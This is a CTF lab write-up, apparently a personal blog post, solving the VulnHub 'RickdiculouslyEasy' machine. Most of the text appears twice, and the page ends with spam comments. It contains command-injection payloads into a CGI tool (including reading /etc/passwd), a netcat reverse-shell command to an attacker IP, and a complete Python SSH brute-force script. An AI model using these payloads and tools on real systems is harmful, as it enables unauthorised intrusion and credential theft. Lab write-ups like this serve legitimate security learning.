Whats up guys ?
Long time since i post another entry in my blog but i'm back and going to do some CTF challenge from vuln hub(link: www.vulnhub.com) i pick the easiest one cause i'm not really that good in CTF. After a while searching for the machine that fit to my need i pick the RickdiculouslyEasy(Pun intended it !)
from the description:
This is a fedora server vm, created with virtualbox. It is a very simple Rick and Morty themed boot to root. There are 130 points worth of flags available (each flag has its points recorded with it), you should also get root. It's designed to be a beginner ctf, if you're new to pen testing, check it out!
i download the .vbox file and run it in virtualbox.
the machine is pretty neat because it is straightly show the ip address of the machine. So i don't have to bother to do ping sweep. well if you see from message it say that the admin console is in port 9090, ok so lets go to that port with web browser.
type : http://<ip address>:9090
at first you will get warning that the certificate is not set up properly so you just have to confirm the exception and moving on
flag 1: FLAG {There is no Zeus, in your face!} - 10 Points
well we got the first flag. Because there is non common port open in the machine i presume there are many non common port also open in the machine so to save time i create simple python script that will check all port in the machine.
ok so we got excatly 7 port is open at the machine. First lets go to the port 21 File Transfer Protocol. i connect to the ftp server using ftp utility in linux.
apparently the ftp enable the anonymous login to all the visitor so that's good thing for us.
yeay! we found the second flag. first switch to the binary mode in order to download the file in ftp.
flag 2: FLAG{Whoa this is unexpected} - 10 Points
lets try to connect to the uncommon port this time. i just pick 13337 from the list. you can connect to the port using nc utility in linux. There you go we got the third flag
so as you can see it show some interesting directory and file that we could explore. long story short there is nothing in the root_shell.cgi file but something interesting come out at tracertool.cgi. the page show a tool to do trace routing.
to all of you who don't know what is the function of cgi-bin. cgi-bin simply let you execute any program other than server side programming such as PHP, so if you put program inside the cgi-bin such as ruby, bash or python it will get executed.But the problem putting this kinda functionality in the website let attacker to do code injection where attacker can execute another code inside the program.
just as expected the page can be exploited with code injection. "127.0.0.1;ls" input let you execute two command, one that execute by the page and one that supply by you because ";" symbol use to separate multiple statement into one line and because it is combine with "ls" command it will execute listing directory command too.
now because do it manually by entering ip address and append it with semicolon again and again will waste my time. so i create a python program to let me just input command to the prompt and return the result.
after running around the directory i found that there is password directory and i found the FLAG.txt but unfortunately every time i type cat command to see the content of the file it show cat picture.
so i just have to use another command to show the inside of the file it is up to you what command you are going to use i just stick using "head" command.
we got the fifth flag.
so i guess that is the password for one of the user inside the machine. to obtain list of user just prompt "127.0.0.1; head -n 50 /etc/passwd" inside the tracertool.cgi
RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash
Morty:x:1001:1001::/home/Morty:/bin/bash
Summer:x:1002:1002::/home/Summer:/bin/bash
we got the following user. so after couple of trying to do ssh to the port 22222 with username "Summer" and password "winter". i got a hit
walk through directory and got another flag.txt
Looking at the file name you can see that the file is obviously contain password that we need for opening the zip file. so just run strings utility to the jpg file and we got the password.
enter the password to zip file and we got the flag
safe the result to txt file in order to be used for brute force. Now at this point you could use any tools for password cracking such as hydra but i like to create my own tool. The following is the code that i create for launching brute force attack to the server.
import paramiko
import sys
import socket
def ssh_connect(target,port,username,password,code = 0):
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh_client.connect(target,port=port,username=username,password=password)
except paramiko.AuthenticationException:
code = 1
except socket.error, e:
code = 2
ssh_client.close()
return code
target = "192.168.1.7" #change the ip address
username = "RickSanchez"
port = 22222
file = open(sys.argv[1],"r")
data = file.readlines()
for x in data:
print x.rstrip("\n")
password = x.rstrip("\n")
if ssh_connect(target,port,username,password) == 0:
print username+":"+x+" success"
sys.exit(0)
the following code may not be as good as hydra i suggest if you don't waste time just use hydra. The password is P7Curtains.
I switch to RickySanchez and enumerate the permission to check if it has root permission. As you can see the user have root permission
next step is use root interactive shell to access the root directory and wallla get the last flag congrats.
flag 9: FLAG: {Ionic Defibrillator} - 30 points
Long time since i post another entry in my blog but i'm back and going to do some CTF challenge from vuln hub(link: www.vulnhub.com) i pick the easiest one cause i'm not really that good in CTF. After a while searching for the machine that fit to my need i pick the RickdiculouslyEasy(Pun intended it !)
from the description:
This is a fedora server vm, created with virtualbox. It is a very simple Rick and Morty themed boot to root. There are 130 points worth of flags available (each flag has its points recorded with it), you should also get root. It's designed to be a beginner ctf, if you're new to pen testing, check it out!
i download the .vbox file and run it in virtualbox.
the machine is pretty neat because it is straightly show the ip address of the machine. So i don't have to bother to do ping sweep. well if you see from message it say that the admin console is in port 9090, ok so lets go to that port with web browser.
type : http://<ip address>:9090
at first you will get warning that the certificate is not set up properly so you just have to confirm the exception and moving on
flag 1: FLAG {There is no Zeus, in your face!} - 10 Points
well we got the first flag. Because there is non common port open in the machine i presume there are many non common port also open in the machine so to save time i create simple python script that will check all port in the machine.
apparently the ftp enable the anonymous login to all the visitor so that's good thing for us.
yeay! we found the second flag. first switch to the binary mode in order to download the file in ftp.
flag 2: FLAG{Whoa this is unexpected} - 10 Points
lets try to connect to the uncommon port this time. i just pick 13337 from the list. you can connect to the port using nc utility in linux. There you go we got the third flag
flag 3: FLAG:{TheyFoundMyBackDoorMorty}-10Points
ok so move on lets try to connect to the other uncommon port 60000 also with nc utility in linux and there you go again we got the fourth flag.
flag 4: FLAG{Flip the pickle Morty!} - 10 Points
move on to the last uncommon port which is 22222. Same again try to use nc again. hmmmm from the banner we got the ssh service running on port 2222 so i try to connect it with ssh utility but nothing is coming out cause i don't know the username nor the password. So move on to the rest port 22 and 80.
Lets try port 80 as you can see from the snipped picture the website show the background of ricky. If you try to analyze the source code it doesn't give anything. So my advice to all of you, if you find nothing in the website try to probe the robots.txt file. It may show you a hidden directory of the website(for detail of robots.txt visit this link: http://www.robotstxt.org/)
to all of you who don't know what is the function of cgi-bin. cgi-bin simply let you execute any program other than server side programming such as PHP, so if you put program inside the cgi-bin such as ruby, bash or python it will get executed.But the problem putting this kinda functionality in the website let attacker to do code injection where attacker can execute another code inside the program.
just as expected the page can be exploited with code injection. "127.0.0.1;ls" input let you execute two command, one that execute by the page and one that supply by you because ";" symbol use to separate multiple statement into one line and because it is combine with "ls" command it will execute listing directory command too.
now because do it manually by entering ip address and append it with semicolon again and again will waste my time. so i create a python program to let me just input command to the prompt and return the result.
after running around the directory i found that there is password directory and i found the FLAG.txt but unfortunately every time i type cat command to see the content of the file it show cat picture.
so i just have to use another command to show the inside of the file it is up to you what command you are going to use i just stick using "head" command.
we got the fifth flag.
flag 5: FLAG{Yeah d- just don't do it.} - 10 Points
because my program could only send command but can't maintain the shell interaction causing me could not change directory freely. So i create backdoor by using "nc" utility that connect back to me.
in your machine type: "nc -nvlp 4444"
in rootshell.cgi type = "127.0.0.1; nc -e /bin/bash <your ip address> 4444"
we got our backdoor. so i notice there is one file beside FLAG.txt so i try to see the content of the file and found another password("winter")
so i guess that is the password for one of the user inside the machine. to obtain list of user just prompt "127.0.0.1; head -n 50 /etc/passwd" inside the tracertool.cgi
RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash
Morty:x:1001:1001::/home/Morty:/bin/bash
Summer:x:1002:1002::/home/Summer:/bin/bash
we got the following user. so after couple of trying to do ssh to the port 22222 with username "Summer" and password "winter". i got a hit
walk through directory and got another flag.txt
flag 6: FLAG{Get off the high road Summer!} - 10 Points
so as you can see from the /etc/passwd file that we saw there are 3 users inside the machine i try to enter one of directory, so i start with Morty directory and found two file first is picture and the other is encrypted zip file.
Looking at the file name you can see that the file is obviously contain password that we need for opening the zip file. so just run strings utility to the jpg file and we got the password.
flag 7: FLAG: {131333} - 20 Points
hmmmm looking at the result it could sign for a hint to the next flag so lets go to another directory and when i arrive i found another executable file called "safe". First of all you cannot execute inside the machine, so you need to download it and change the format of the permission inside your machine. Try to run it i got a hint how to use the executable it need to be provided with parameter.
after couple of testing i found the parameter is the 7th flag.
flag 8: FLAG{And Awwwaaaaayyyy we Go!} - 20 Points
as you can see this is the last hint for the last flag and it stated that in order to get the password for user ricky.
after taking time for research i found the band name is "flesh curtains"
to safe time i create a script to list all the possible password that could be used from this two word combine with the also.
safe the result to txt file in order to be used for brute force. Now at this point you could use any tools for password cracking such as hydra but i like to create my own tool. The following is the code that i create for launching brute force attack to the server.
import paramiko
import sys
import socket
def ssh_connect(target,port,username,password,code = 0):
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh_client.connect(target,port=port,username=username,password=password)
except paramiko.AuthenticationException:
code = 1
except socket.error, e:
code = 2
ssh_client.close()
return code
target = "192.168.1.7" #change the ip address
username = "RickSanchez"
port = 22222
file = open(sys.argv[1],"r")
data = file.readlines()
for x in data:
print x.rstrip("\n")
password = x.rstrip("\n")
if ssh_connect(target,port,username,password) == 0:
print username+":"+x+" success"
sys.exit(0)
the following code may not be as good as hydra i suggest if you don't waste time just use hydra. The password is P7Curtains.
I switch to RickySanchez and enumerate the permission to check if it has root permission. As you can see the user have root permission
flag 9: FLAG: {Ionic Defibrillator} - 30 points
Rick and morty face You made such an interesting piece to read, giving every subject enlightenment for us to gain knowledge. Thanks for sharing the such information with us to read this...
ReplyDeleteThank you for some other informative website. The pace may just I get that kind of information written in such a perfect method? I have a venture that I am simply now running on, and I’ve been at the glance out for such info. Websites to go on when bored
ReplyDelete